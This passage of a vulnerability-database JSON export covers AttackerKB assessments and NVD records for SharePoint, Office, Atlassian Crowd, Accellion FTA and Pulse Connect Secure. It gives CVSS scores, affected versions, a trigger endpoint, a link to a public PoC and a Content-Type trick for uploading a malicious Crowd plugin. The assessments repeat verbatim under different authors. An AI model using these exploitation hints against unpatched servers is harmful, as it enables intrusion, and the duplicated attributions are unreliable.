vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2019-0594.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:46pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\n**ccondon-r7** at August 31, 2020 2:18pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\n**hrbrmstr** at May 12, 2020 7:48pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-03-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-0604", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2021-07-27T00:00:00", "id": "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "href": "https://attackerkb.com/topics/JvMypun0L7/cve-2019-0604", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:35:40", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-11882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "modified": "2021-07-27T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T17:32:31", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-04-28T11:49:16", "description": "Accellion FTA 9_12_411 and earlier is affected by OS command execution via a local web service call. The fixed version is FTA_9_12_416 and later.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T21:15:00", "title": "CVE-2021-27102", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27102"], "modified": "2021-02-19T21:26:00", "cpe": ["cpe:/a:accellion:fta:9_12_411"], "id": "CVE-2021-27102", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27102", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:accellion:fta:9_12_411:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-28T11:49:16", "description": "Accellion FTA 9_12_411 and earlier is affected by SSRF via a crafted POST request to wmProgressstat.html. The fixed version is FTA_9_12_416 and later.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T21:15:00", "title": "CVE-2021-27103", "type": "cve", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27103"], "modified": "2021-02-17T18:53:00", "cpe": ["cpe:/a:accellion:fta:9_12_411"], "id": "CVE-2021-27103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:accellion:fta:9_12_411:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-28T11:49:16", "description": "Accellion FTA 9_12_370 and earlier is affected by OS command execution via a crafted POST request to various admin endpoints. The fixed version is FTA_9_12_380 and later.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T21:15:00", "title": "CVE-2021-27104", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27104"], "modified": "2021-02-17T18:52:00", "cpe": ["cpe:/a:accellion:fta:9_12_370"], "id": "CVE-2021-27104", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27104", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:accellion:fta:9_12_370:*:*:*:*:*:*:*"]}, {"lastseen": "2021-06-05T07:38:28", "description": "A buffer overflow vulnerability exists in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated attacker to execute arbitrary code as the root user via maliciously crafted meeting room.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T12:15:00", "title": "CVE-2021-22894", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22894"], "modified": "2021-06-04T18:10:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.0", "cpe:/a:pulsesecure:pulse_connect_secure:9.1"], "id": "CVE-2021-22894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22894", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*"]}, {"lastseen": "2021-04-28T11:49:16", "description": "Accellion FTA 9_12_370 and earlier is affected by SQL injection via a crafted Host header in a request to document_root.html. The fixed version is FTA_9_12_380 and later.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T21:15:00", "title": "CVE-2021-27101", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101"], "modified": "2021-02-17T19:04:00", "cpe": ["cpe:/a:accellion:fta:9_12_370"], "id": "CVE-2021-27101", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:accellion:fta:9_12_370:*:*:*:*:*:*:*"]}, {"lastseen": "2021-06-05T07:38:28", "description": "A command injection vulnerability exists in Pulse Connect Secure before 9.1R11.4 allows a remote authenticated attacker to perform remote code execution via Windows Resource Profiles Feature", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T12:15:00", "title": "CVE-2021-22899", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22899"], "modified": "2021-06-04T17:48:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.0", "cpe:/a:pulsesecure:pulse_connect_secure:9.0rx", "cpe:/a:pulsesecure:pulse_connect_secure:9.1"], "id": "CVE-2021-22899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22899", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", 